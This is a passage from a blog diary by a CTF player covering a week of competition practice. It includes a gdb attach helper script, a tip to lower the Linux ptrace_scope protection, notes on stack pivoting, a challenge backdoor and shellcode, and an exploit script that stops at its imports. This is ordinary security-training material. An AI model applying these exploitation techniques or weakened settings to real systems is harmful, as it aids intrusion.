<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8" />
  <meta name="generator" content="Hugo 0.119.0">

  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="author" content="LittFlower." />
  <meta property="og:url" content="http://littflower.github.io/posts/%E5%91%A8%E6%8A%A54/" />
  <link rel="canonical" href="http://littflower.github.io/posts/%E5%91%A8%E6%8A%A54/" /><link rel="alternate" type="application/atom+xml" href="http://littflower.github.ioindex.xml" title="一只花盆.">

  <script type="application/ld+json">
  {
      "@context" : "http://schema.org",
      "@type" : "BlogPosting",
      "mainEntityOfPage": {
           "@type": "WebPage",
           "@id": "http:\/\/littflower.github.io"
      },
      "articleSection" : "posts",
      "name" : "",
      "headline" : "",
      "description" : "2025 寒假第二次周报 1.20 今天过生日 \u002b 回高中宣讲（\n宣讲纯纯坐牢，不过居然面基了其他学校的一些做 ctf 的小登师傅，没绷住\n顺便回机房看了看学弟，还是没有学妹哇（恼）\n在等宣讲的时候打开电脑写周报的人是屑.jpg\n1.21 今天出去陪 npy 逛了一天，唉，明天就该滚回自己家了。。。\n1.22 满血复活，回家开始看春秋杯的那道 toys，对着 exp 调了半天，大概看明白，核心思路就是抬栈以免破坏 got 表附近的一些结构。\n但是其实并不是很理解这个操作。。\n调试的时候这个地方被调糊涂了很久，因为 payload 是交错的（（\n下了 SUCTF 的附件，开始补题。\n研究了一下有没有什么办法可以调试大型项目的宏定义，看来看去还是 grep 最好用（（（，但是这玩意不支持动态计算宏，也不是很方便\n研究了一下 gdb 调试父子进程的方法，exp 这块晚秋之前给了个小 trick，我升级了一下：\ndef debug(): command = [\u0026#34;ps\u0026#34;, \u0026#34;-ax\u0026#34;] grep_command = [\u0026#34;grep\u0026#34;, \u0026#34;attachment\u0026#34;] # 执行 ps 命令 ps_process = subprocess.Popen(command, stdout=subprocess.PIPE) # 将 ps 命令的输出作为 grep 命令的输入 grep_process = subprocess.Popen(grep_command, stdin=ps_process.stdout, stdout=subprocess.PIPE) # 允许 ps 命令的输出流直接传递到 grep 命令 ps_process.",
      "inLanguage" : "en-US",
      "author" : "LittFlower.",
      "creator" : "LittFlower.",
      "publisher": "LittFlower.",
      "accountablePerson" : "LittFlower.",
      "copyrightHolder" : "LittFlower.",
      "copyrightYear" : "0001",
      "datePublished": "0001-01-01 00:00:00 \u002b0000 UTC",
      "dateModified" : "0001-01-01 00:00:00 \u002b0000 UTC",
      "url" : "http:\/\/littflower.github.io\/posts\/%E5%91%A8%E6%8A%A54\/",
      "keywords" : [  ]
  }
</script>
<title></title>
  <meta property="og:title" content="" />
  <meta property="og:type" content="article" />
  <meta property="og:description" content="2025 寒假第二次周报 1.20 今天过生日 &#43; 回高中宣讲（
宣讲纯纯坐牢，不过居然面基了其他学校的一些做 ctf 的小登师傅，没绷住
顺便回机房看了看学弟，还是没有学妹哇（恼）
在等宣讲的时候打开电脑写周报的人是屑.jpg
1.21 今天出去陪 npy 逛了一天，唉，明天就该滚回自己家了。。。
1.22 满血复活，回家开始看春秋杯的那道 toys，对着 exp 调了半天，大概看明白，核心思路就是抬栈以免破坏 got 表附近的一些结构。
但是其实并不是很理解这个操作。。
调试的时候这个地方被调糊涂了很久，因为 payload 是交错的（（
下了 SUCTF 的附件，开始补题。
研究了一下有没有什么办法可以调试大型项目的宏定义，看来看去还是 grep 最好用（（（，但是这玩意不支持动态计算宏，也不是很方便
研究了一下 gdb 调试父子进程的方法，exp 这块晚秋之前给了个小 trick，我升级了一下：
def debug(): command = [&amp;#34;ps&amp;#34;, &amp;#34;-ax&amp;#34;] grep_command = [&amp;#34;grep&amp;#34;, &amp;#34;attachment&amp;#34;] # 执行 ps 命令 ps_process = subprocess.Popen(command, stdout=subprocess.PIPE) # 将 ps 命令的输出作为 grep 命令的输入 grep_process = subprocess.Popen(grep_command, stdin=ps_process.stdout, stdout=subprocess.PIPE) # 允许 ps 命令的输出流直接传递到 grep 命令 ps_process." />
  <meta name="description" content="2025 寒假第二次周报 1.20 今天过生日 &#43; 回高中宣讲（
宣讲纯纯坐牢，不过居然面基了其他学校的一些做 ctf 的小登师傅，没绷住
顺便回机房看了看学弟，还是没有学妹哇（恼）
在等宣讲的时候打开电脑写周报的人是屑.jpg
1.21 今天出去陪 npy 逛了一天，唉，明天就该滚回自己家了。。。
1.22 满血复活，回家开始看春秋杯的那道 toys，对着 exp 调了半天，大概看明白，核心思路就是抬栈以免破坏 got 表附近的一些结构。
但是其实并不是很理解这个操作。。
调试的时候这个地方被调糊涂了很久，因为 payload 是交错的（（
下了 SUCTF 的附件，开始补题。
研究了一下有没有什么办法可以调试大型项目的宏定义，看来看去还是 grep 最好用（（（，但是这玩意不支持动态计算宏，也不是很方便
研究了一下 gdb 调试父子进程的方法，exp 这块晚秋之前给了个小 trick，我升级了一下：
def debug(): command = [&amp;#34;ps&amp;#34;, &amp;#34;-ax&amp;#34;] grep_command = [&amp;#34;grep&amp;#34;, &amp;#34;attachment&amp;#34;] # 执行 ps 命令 ps_process = subprocess.Popen(command, stdout=subprocess.PIPE) # 将 ps 命令的输出作为 grep 命令的输入 grep_process = subprocess.Popen(grep_command, stdin=ps_process.stdout, stdout=subprocess.PIPE) # 允许 ps 命令的输出流直接传递到 grep 命令 ps_process." />
  <meta property="og:locale" content="en-us" /><meta property="og:image" content="" />
  

  
    <style>body{font-family:sarasa-fixed-sc,sans-serif;-webkit-font-smoothing:antialiased;src:url(https://cdn.jsdelivr.net/npm/firacode@6.2.0/distr/ttf/FiraCode-Light.ttf)format('ttf');margin:0 20px}article{max-width:1100px;margin-left:auto;margin-right:auto}a{color:#000;text-decoration:none}a:hover{font-weight:700;text-decoration:underline}.post-ads{margin:50px 0}.markdown-body{font-size:17.5px;max-width:100%}.markdown-body a{text-decoration:underline;text-decoration-color:#4005f3}.markdown-body blockquote{margin:0;padding:0 1em;color:#494d53;border-left:.25em solid #0b79e7}.markdown-body pre{padding:12px;overflow:auto;border-radius:10px}.markdown-body code{padding:.1em 0;font-size:100%;background-color:#eef1f3;border-radius:6px}.markdown-body pre>code{padding:0;font-size:95%;background-color:inherit;border:0}.markdown-body pre{background-color:#272822}.hljs{font-size:17.2px;color:#eef1f3}ul,ol{margin:.25em 0;line-height:1.6}ul ul,ul ol,ol ul,ol ol{margin:.25em 0}li{padding:.25em 0}h1{font-size:1.83rem}h2{font-size:1.74rem}h3{font-size:1.45rem}h4{font-size:1.28rem}h5{font-size:1.16rem}h6{font-size:1.21rem}.Chinese .markdown-body{line-height:200%}.site-date-catalog{font-size:2rem}.header-title{font-size:2rem;font-weight:700;margin-top:32px;font-family:source code pro,sans-serif;src:url(https://cdn.jsdelivr.net/npm/source-code-pro@2.38.0/WOFF/TTF/SourceCodePro-Bold.ttf.woff)format("woff")}.header-title a{text-decoration:none}.header-subtitle{color:#666}.header-items{margin:10px 0}.header-item{margin:0 5px}.header-line{width:100%;border-width:2px;border-color:#482936;border-style:solid none none none}.lang-switch{font-weight:700}#posts-list{min-height:600px}.posts-line{font-size:1.2rem;margin:12px 0}.posts-categories{font-size:.8rem;margin:auto;text-align:center}.posts-category{padding:3px 0;border:#000 2px solid;border-radius:5px}.site-footer{margin-top:50px}.site-footer-item{margin-right:12px}.post-content img{max-width:100%;display:block;margin-right:auto;margin-top:12px}.post-header{margin-bottom:50px}.post-title{font-size:2rem;font-weight:600}.post-tags{display:inline;font-weight:600;padding:2px 5px;margin-right:6px;border:#000 2px solid;border-radius:5px}.post-date{font-weight:800;font-style:italic}.post-author{float:right;font-weight:600}.page-content{min-height:60%}.post-content{margin-bottom:50px}.post-content p{hyphens:auto;line-height:1.8;text-justify:ideographic;margin-bottom:1em}.related-content{border-width:3px;border-style:solid;border-color:#000;padding:0 10px;margin-bottom:50px;margin-top:100px}.related-content li{margin:5px 0}.taxonomy-term{font-size:3rem}.gallery-img{text-align:center}.gallery-img span{text-align:center}.gallery-img-desc{font-size:.8em;font-weight:800}#disqus_thread{position:relative}#disqus_thread:after{content:"";display:block;height:55px;width:100%;position:absolute;bottom:0;background:#fff}@media screen and (max-width:600px){.header-title,.header-subtitle,.header-items{text-align:center}.posts-line{font-size:16px}.markdown-body{font-size:16px}.post-title{font-size:2rem}.post-content p{letter-spacing:.05em}}@media screen and (max-width:48em){.posts-category{display:none}}:root{--nav-width:1380px;--article-width:650px;--toc-width:300px}.toc{margin:0 2px 40px;border:1px solid var(--border);background:var(--entry);border-radius:var(--radius);padding:.4em}.toc-container.wide{position:absolute;height:100%;border-right:1px solid var(--border);left:calc((var(--toc-width) + var(--gap)) * -1);top:calc(var(--gap) * 2);width:var(--toc-width)}.wide .toc{position:sticky;top:var(--gap);border:unset;background:unset;border-radius:unset;width:100%;margin:0 2px 40px}.toc details summary{cursor:zoom-in;margin-inline-start:20px;padding:12px 0}.toc details[open] summary{font-weight:500}.toc-container.wide .toc .inner{margin:0}.active{font-size:110%;font-weight:600}.toc ul{list-style-type:circle}.toc .inner{margin:0 0 0 20px;padding:0 15px 15px 20px;font-size:16px;max-height:83vh;overflow-y:auto}.toc .inner::-webkit-scrollbar-thumb{background:var(--border);border:7px solid var(--theme);border-radius:var(--radius)}.toc li ul{margin-inline-start:calc(var(--gap) * .5);list-style-type:none}.toc li{list-style:none;font-size:.95rem;padding-bottom:5px}.toc li a:hover{color:var(--secondary)}</style>
  
  
    <style>.container,.container-fluid{margin-right:auto;margin-left:auto}.container-fluid{padding-right:2rem;padding-left:2rem}.row{box-sizing:border-box;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-flex:0;-ms-flex:0 1 auto;flex:initial;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row;-ms-flex-wrap:wrap;flex-wrap:wrap;margin-right:-.5rem;margin-left:-.5rem}.row.reverse{-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.col.reverse{-webkit-box-orient:vertical;-webkit-box-direction:reverse;-ms-flex-direction:column-reverse;flex-direction:column-reverse}.col-xs,.col-xs-1,.col-xs-10,.col-xs-11,.col-xs-12,.col-xs-2,.col-xs-3,.col-xs-4,.col-xs-5,.col-xs-6,.col-xs-7,.col-xs-8,.col-xs-9,.col-xs-offset-0,.col-xs-offset-1,.col-xs-offset-10,.col-xs-offset-11,.col-xs-offset-12,.col-xs-offset-2,.col-xs-offset-3,.col-xs-offset-4,.col-xs-offset-5,.col-xs-offset-6,.col-xs-offset-7,.col-xs-offset-8,.col-xs-offset-9{box-sizing:border-box;-webkit-box-flex:0;-ms-flex:0 0 auto;flex:none;padding-right:.5rem;padding-left:.5rem}.col-xs{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;-ms-flex-preferred-size:0;flex-basis:0;max-width:100%}.col-xs-1{-ms-flex-preferred-size:8.33333333%;flex-basis:8.33333333%;max-width:8.33333333%}.col-xs-2{-ms-flex-preferred-size:16.66666667%;flex-basis:16.66666667%;max-width:16.66666667%}.col-xs-3{-ms-flex-preferred-size:25%;flex-basis:25%;max-width:25%}.col-xs-4{-ms-flex-preferred-size:33.33333333%;flex-basis:33.33333333%;max-width:33.33333333%}.col-xs-5{-ms-flex-preferred-size:41.66666667%;flex-basis:41.66666667%;max-width:41.66666667%}.col-xs-6{-ms-flex-preferred-size:50%;flex-basis:50%;max-width:50%}.col-xs-7{-ms-flex-preferred-size:58.33333333%;flex-basis:58.33333333%;max-width:58.33333333%}.col-xs-8{-ms-flex-preferred-size:66.66666667%;flex-basis:66.66666667%;max-width:66.66666667%}.col-xs-9{-ms-flex-preferred-size:75%;flex-basis:75%;max-width:75%}.col-xs-10{-ms-flex-preferred-size:83.33333333%;flex-basis:83.33333333%;max-width:83.33333333%}.col-xs-11{-ms-flex-preferred-size:91.66666667%;flex-basis:91.66666667%;max-width:91.66666667%}.col-xs-12{-ms-flex-preferred-size:100%;flex-basis:100%;max-width:100%}.col-xs-offset-0{margin-left:0}.col-xs-offset-1{margin-left:8.33333333%}.col-xs-offset-2{margin-left:16.66666667%}.col-xs-offset-3{margin-left:25%}.col-xs-offset-4{margin-left:33.33333333%}.col-xs-offset-5{margin-left:41.66666667%}.col-xs-offset-6{margin-left:50%}.col-xs-offset-7{margin-left:58.33333333%}.col-xs-offset-8{margin-left:66.66666667%}.col-xs-offset-9{margin-left:75%}.col-xs-offset-10{margin-left:83.33333333%}.col-xs-offset-11{margin-left:91.66666667%}.start-xs{-webkit-box-pack:start;-ms-flex-pack:start;justify-content:flex-start;text-align:start}.center-xs{-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center}.end-xs{-webkit-box-pack:end;-ms-flex-pack:end;justify-content:flex-end;text-align:end}.top-xs{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.middle-xs{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.bottom-xs{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}.around-xs{-ms-flex-pack:distribute;justify-content:space-around}.between-xs{-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between}.first-xs{-webkit-box-ordinal-group:0;-ms-flex-order:-1;order:-1}.last-xs{-webkit-box-ordinal-group:2;-ms-flex-order:1;order:1}@media only screen and (min-width:48em){.container{width:49rem}.col-sm,.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9,.col-sm-offset-0,.col-sm-offset-1,.col-sm-offset-10,.col-sm-offset-11,.col-sm-offset-12,.col-sm-offset-2,.col-sm-offset-3,.col-sm-offset-4,.col-sm-offset-5,.col-sm-offset-6,.col-sm-offset-7,.col-sm-offset-8,.col-sm-offset-9{box-sizing:border-box;-webkit-box-flex:0;-ms-flex:0 0 auto;flex:none;padding-right:.5rem;padding-left:.5rem}.col-sm{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;-ms-flex-preferred-size:0;flex-basis:0;max-width:100%}.col-sm-1{-ms-flex-preferred-size:8.33333333%;flex-basis:8.33333333%;max-width:8.33333333%}.col-sm-2{-ms-flex-preferred-size:16.66666667%;flex-basis:16.66666667%;max-width:16.66666667%}.col-sm-3{-ms-flex-preferred-size:25%;flex-basis:25%;max-width:25%}.col-sm-4{-ms-flex-preferred-size:33.33333333%;flex-basis:33.33333333%;max-width:33.33333333%}.col-sm-5{-ms-flex-preferred-size:41.66666667%;flex-basis:41.66666667%;max-width:41.66666667%}.col-sm-6{-ms-flex-preferred-size:50%;flex-basis:50%;max-width:50%}.col-sm-7{-ms-flex-preferred-size:58.33333333%;flex-basis:58.33333333%;max-width:58.33333333%}.col-sm-8{-ms-flex-preferred-size:66.66666667%;flex-basis:66.66666667%;max-width:66.66666667%}.col-sm-9{-ms-flex-preferred-size:75%;flex-basis:75%;max-width:75%}.col-sm-10{-ms-flex-preferred-size:83.33333333%;flex-basis:83.33333333%;max-width:83.33333333%}.col-sm-11{-ms-flex-preferred-size:91.66666667%;flex-basis:91.66666667%;max-width:91.66666667%}.col-sm-12{-ms-flex-preferred-size:100%;flex-basis:100%;max-width:100%}.col-sm-offset-0{margin-left:0}.col-sm-offset-1{margin-left:8.33333333%}.col-sm-offset-2{margin-left:16.66666667%}.col-sm-offset-3{margin-left:25%}.col-sm-offset-4{margin-left:33.33333333%}.col-sm-offset-5{margin-left:41.66666667%}.col-sm-offset-6{margin-left:50%}.col-sm-offset-7{margin-left:58.33333333%}.col-sm-offset-8{margin-left:66.66666667%}.col-sm-offset-9{margin-left:75%}.col-sm-offset-10{margin-left:83.33333333%}.col-sm-offset-11{margin-left:91.66666667%}.start-sm{-webkit-box-pack:start;-ms-flex-pack:start;justify-content:flex-start;text-align:start}.center-sm{-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center}.end-sm{-webkit-box-pack:end;-ms-flex-pack:end;justify-content:flex-end;text-align:end}.top-sm{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.middle-sm{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.bottom-sm{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}.around-sm{-ms-flex-pack:distribute;justify-content:space-around}.between-sm{-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between}.first-sm{-webkit-box-ordinal-group:0;-ms-flex-order:-1;order:-1}.last-sm{-webkit-box-ordinal-group:2;-ms-flex-order:1;order:1}}@media only screen and (min-width:64em){.container{width:65rem}.col-md,.col-md-1,.col-md-10,.col-md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-offset-0,.col-md-offset-1,.col-md-offset-10,.col-md-offset-11,.col-md-offset-12,.col-md-offset-2,.col-md-offset-3,.col-md-offset-4,.col-md-offset-5,.col-md-offset-6,.col-md-offset-7,.col-md-offset-8,.col-md-offset-9{box-sizing:border-box;-webkit-box-flex:0;-ms-flex:0 0 auto;flex:none;padding-right:.5rem;padding-left:.5rem}.col-md{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;-ms-flex-preferred-size:0;flex-basis:0;max-width:100%}.col-md-1{-ms-flex-preferred-size:8.33333333%;flex-basis:8.33333333%;max-width:8.33333333%}.col-md-2{-ms-flex-preferred-size:16.66666667%;flex-basis:16.66666667%;max-width:16.66666667%}.col-md-3{-ms-flex-preferred-size:25%;flex-basis:25%;max-width:25%}.col-md-4{-ms-flex-preferred-size:33.33333333%;flex-basis:33.33333333%;max-width:33.33333333%}.col-md-5{-ms-flex-preferred-size:41.66666667%;flex-basis:41.66666667%;max-width:41.66666667%}.col-md-6{-ms-flex-preferred-size:50%;flex-basis:50%;max-width:50%}.col-md-7{-ms-flex-preferred-size:58.33333333%;flex-basis:58.33333333%;max-width:58.33333333%}.col-md-8{-ms-flex-preferred-size:66.66666667%;flex-basis:66.66666667%;max-width:66.66666667%}.col-md-9{-ms-flex-preferred-size:75%;flex-basis:75%;max-width:75%}.col-md-10{-ms-flex-preferred-size:83.33333333%;flex-basis:83.33333333%;max-width:83.33333333%}.col-md-11{-ms-flex-preferred-size:91.66666667%;flex-basis:91.66666667%;max-width:91.66666667%}.col-md-12{-ms-flex-preferred-size:100%;flex-basis:100%;max-width:100%}.col-md-offset-0{margin-left:0}.col-md-offset-1{margin-left:8.33333333%}.col-md-offset-2{margin-left:16.66666667%}.col-md-offset-3{margin-left:25%}.col-md-offset-4{margin-left:33.33333333%}.col-md-offset-5{margin-left:41.66666667%}.col-md-offset-6{margin-left:50%}.col-md-offset-7{margin-left:58.33333333%}.col-md-offset-8{margin-left:66.66666667%}.col-md-offset-9{margin-left:75%}.col-md-offset-10{margin-left:83.33333333%}.col-md-offset-11{margin-left:91.66666667%}.start-md{-webkit-box-pack:start;-ms-flex-pack:start;justify-content:flex-start;text-align:start}.center-md{-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center}.end-md{-webkit-box-pack:end;-ms-flex-pack:end;justify-content:flex-end;text-align:end}.top-md{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.middle-md{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.bottom-md{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}.around-md{-ms-flex-pack:distribute;justify-content:space-around}.between-md{-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between}.first-md{-webkit-box-ordinal-group:0;-ms-flex-order:-1;order:-1}.last-md{-webkit-box-ordinal-group:2;-ms-flex-order:1;order:1}}@media only screen and (min-width:75em){.container{width:76rem}.col-lg,.col-lg-1,.col-lg-10,.col-lg-11,.col-lg-12,.col-lg-2,.col-lg-3,.col-lg-4,.col-lg-5,.col-lg-6,.col-lg-7,.col-lg-8,.col-lg-9,.col-lg-offset-0,.col-lg-offset-1,.col-lg-offset-10,.col-lg-offset-11,.col-lg-offset-12,.col-lg-offset-2,.col-lg-offset-3,.col-lg-offset-4,.col-lg-offset-5,.col-lg-offset-6,.col-lg-offset-7,.col-lg-offset-8,.col-lg-offset-9{box-sizing:border-box;-webkit-box-flex:0;-ms-flex:0 0 auto;flex:none;padding-right:.5rem;padding-left:.5rem}.col-lg{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;-ms-flex-preferred-size:0;flex-basis:0;max-width:100%}.col-lg-1{-ms-flex-preferred-size:8.33333333%;flex-basis:8.33333333%;max-width:8.33333333%}.col-lg-2{-ms-flex-preferred-size:16.66666667%;flex-basis:16.66666667%;max-width:16.66666667%}.col-lg-3{-ms-flex-preferred-size:25%;flex-basis:25%;max-width:25%}.col-lg-4{-ms-flex-preferred-size:33.33333333%;flex-basis:33.33333333%;max-width:33.33333333%}.col-lg-5{-ms-flex-preferred-size:41.66666667%;flex-basis:41.66666667%;max-width:41.66666667%}.col-lg-6{-ms-flex-preferred-size:50%;flex-basis:50%;max-width:50%}.col-lg-7{-ms-flex-preferred-size:58.33333333%;flex-basis:58.33333333%;max-width:58.33333333%}.col-lg-8{-ms-flex-preferred-size:66.66666667%;flex-basis:66.66666667%;max-width:66.66666667%}.col-lg-9{-ms-flex-preferred-size:75%;flex-basis:75%;max-width:75%}.col-lg-10{-ms-flex-preferred-size:83.33333333%;flex-basis:83.33333333%;max-width:83.33333333%}.col-lg-11{-ms-flex-preferred-size:91.66666667%;flex-basis:91.66666667%;max-width:91.66666667%}.col-lg-12{-ms-flex-preferred-size:100%;flex-basis:100%;max-width:100%}.col-lg-offset-0{margin-left:0}.col-lg-offset-1{margin-left:8.33333333%}.col-lg-offset-2{margin-left:16.66666667%}.col-lg-offset-3{margin-left:25%}.col-lg-offset-4{margin-left:33.33333333%}.col-lg-offset-5{margin-left:41.66666667%}.col-lg-offset-6{margin-left:50%}.col-lg-offset-7{margin-left:58.33333333%}.col-lg-offset-8{margin-left:66.66666667%}.col-lg-offset-9{margin-left:75%}.col-lg-offset-10{margin-left:83.33333333%}.col-lg-offset-11{margin-left:91.66666667%}.start-lg{-webkit-box-pack:start;-ms-flex-pack:start;justify-content:flex-start;text-align:start}.center-lg{-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center}.end-lg{-webkit-box-pack:end;-ms-flex-pack:end;justify-content:flex-end;text-align:end}.top-lg{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.middle-lg{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.bottom-lg{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}.around-lg{-ms-flex-pack:distribute;justify-content:space-around}.between-lg{-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between}.first-lg{-webkit-box-ordinal-group:0;-ms-flex-order:-1;order:-1}.last-lg{-webkit-box-ordinal-group:2;-ms-flex-order:1;order:1}}</style>
  

  

  <link href="/index.xml" rel="alternate" type="application/rss+xml"
    title="一只花盆.">
  
  <link rel="preconnect" href="https://fonts.gstatic.com">
  <link href="https://fonts.googleapis.com/css?family=Bree+Serif|Bungee+Shade" rel="stylesheet">
  
  

  
  
</head>


<body>
  <article class="post " id="article">
    <div class="row">
      <div class="col-xs-12">
        <div class="site-header">
          
<header>
  <div class="header-title">
    <a href="/"
      >小花ฅ.</a
    >
  </div>
  <div class="header-subtitle"></div>
</header>
<div class="row end-md center-xs header-items">
  
  <div class="header-item">
    <a href="https://blog.littflower.top/aboutme" target="_blank">AboutMe</a>
  </div>
  
  <div class="header-item">
    <a href="https://github.com/LittFlower" target="_blank">Github</a>
  </div>
  
  <div class="header-item">
    <a href="https://blog.littflower.top/friends" target="_blank">Friends</a>
  </div>
  
</div>
<div class="row end-xs">
   
</div>
<div class="header-line"></div>

        </div>
        <header class="post-header">
          <h1 class="post-title"></h1>
          
          <div class="row post-desc">
            <div class="col-xs-6">
              
            </div>
            <div class="col-xs-6">
              
              <div class="post-author">
                <a target="_blank" href="https://blog.littflower.top">@LittFlower.</a>
              </div>
              
            </div>
          </div>
          
        </header>

        <div class="post-content markdown-body">
          
          <h2 id="2025-寒假第二次周报">2025 寒假第二次周报</h2>
<h3 id="120">1.20</h3>
<p>今天过生日 + 回高中宣讲（</p>
<p>宣讲纯纯坐牢，不过居然面基了其他学校的一些做 ctf 的小登师傅，没绷住</p>
<p>顺便回机房看了看学弟，还是没有学妹哇（恼）</p>
<p>在等宣讲的时候打开电脑写周报的人是屑.jpg</p>
<h3 id="121">1.21</h3>
<p>今天出去陪 npy 逛了一天，唉，明天就该滚回自己家了。。。</p>
<h3 id="122">1.22</h3>
<p>满血复活，回家开始看春秋杯的那道 toys，对着 exp 调了半天，大概看明白，核心思路就是抬栈以免破坏 got 表附近的一些结构。</p>
<p>但是其实并不是很理解这个操作。。</p>
<p>调试的时候这个地方被调糊涂了很久，因为 payload 是交错的（（</p>
<p>下了 SUCTF 的附件，开始补题。</p>
<p>研究了一下有没有什么办法可以调试大型项目的宏定义，看来看去还是 grep 最好用（（（，但是这玩意不支持动态计算宏，也不是很方便</p>
<p>研究了一下 gdb 调试父子进程的方法，exp 这块晚秋之前给了个小 trick，我升级了一下：</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">debug</span>():
</span></span><span style="display:flex;"><span>    command <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;ps&#34;</span>, <span style="color:#e6db74">&#34;-ax&#34;</span>]
</span></span><span style="display:flex;"><span>    grep_command <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;grep&#34;</span>, <span style="color:#e6db74">&#34;attachment&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># 执行 ps 命令</span>
</span></span><span style="display:flex;"><span>    ps_process <span style="color:#f92672">=</span> subprocess<span style="color:#f92672">.</span>Popen(command, stdout<span style="color:#f92672">=</span>subprocess<span style="color:#f92672">.</span>PIPE)
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># 将 ps 命令的输出作为 grep 命令的输入</span>
</span></span><span style="display:flex;"><span>    grep_process <span style="color:#f92672">=</span> subprocess<span style="color:#f92672">.</span>Popen(grep_command, stdin<span style="color:#f92672">=</span>ps_process<span style="color:#f92672">.</span>stdout, stdout<span style="color:#f92672">=</span>subprocess<span style="color:#f92672">.</span>PIPE)
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># 允许 ps 命令的输出流直接传递到 grep 命令</span>
</span></span><span style="display:flex;"><span>    ps_process<span style="color:#f92672">.</span>stdout<span style="color:#f92672">.</span>close()
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># 获取最终输出</span>
</span></span><span style="display:flex;"><span>    output <span style="color:#f92672">=</span> grep_process<span style="color:#f92672">.</span>communicate()[<span style="color:#ae81ff">0</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># 输出结果</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># print(output.decode())</span>
</span></span><span style="display:flex;"><span>    pid<span style="color:#f92672">=</span>int(output<span style="color:#f92672">.</span>decode()<span style="color:#f92672">.</span>split(<span style="color:#e6db74">&#39; &#39;</span>)[<span style="color:#ae81ff">14</span>],<span style="color:#ae81ff">10</span>)
</span></span><span style="display:flex;"><span>    attach(pid)
</span></span><span style="display:flex;"><span>    pause()
</span></span></code></pre></div><p>这样可以准确使用脚本调试想调试的某一个子进程。</p>
<p>discord 群里给了一些参考文献：https://sourceware.org/gdb/current/onlinedocs/gdb.html/Forks.html，这个文档里基本上推荐的做法也是 ps 查看 pid，然后 attach 上去，上面的只是把这个思路脚本化了。</p>
<p>另外如果 linux 禁止 attach 进程的话，可能得把 <code>/proc/sys/kernel/yama/ptrace_scope</code> 设置成 0。</p>
<h3 id="123">1.23</h3>
<p>让晚秋爹做了下 toys 那个题，思路确实是抬栈，btw 我写不来这个 exp（</p>
<p>t1d 放了个 rustsignout，逆天史题，不过我今天还没仔细吃，只是简单看了下逆向</p>
<p>学了一个新东西，deccomp2dbg。之前 qwb 的时候，晚上在晚秋房间看了一会，但是时间紧就没仔细学，这次好好学了下，感觉还行。</p>
<h3 id="124">1.24</h3>
<p>正式开吃了，先调逆向部分：</p>
<blockquote>
<p>👴：有 backdoor？那拿下了呀。</p>
<p>👴：这 backdoor 怎么触发？base67？</p>
<p>👴：怎么还需要构造啊，t1d 设计的什么逆天编码算法</p>
<p>👴：调不出来啊，构造，错了，草！</p>
<p>👴：cnmdsbt1d***</p>
</blockquote>
<p>绷不住了，最后去问了 KFC 师傅，师傅说用 gpt 秒了，真好</p>
<h3 id="125">1.25</h3>
<p>今天在搞 shellcode 部分，这部分还是比较有意思的，我本地很快就打通了，但是远程有点抽象（</p>
<p>什么正经题目会把远程和本地搞的不一样哇草</p>
<p>贴一下本地的 exp:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/env python3</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> pwn <span style="color:#f92672">import</span> <span style="color:#f92672">*</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> sys <span style="color:#f92672">import</span> argv
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> ctypes <span style="color:#f92672">import</span> <span style="color:#f92672">*</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> string
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> keystone <span style="color:#f92672">import</span> Ks, KS_ARCH_X86, KS_MODE_64
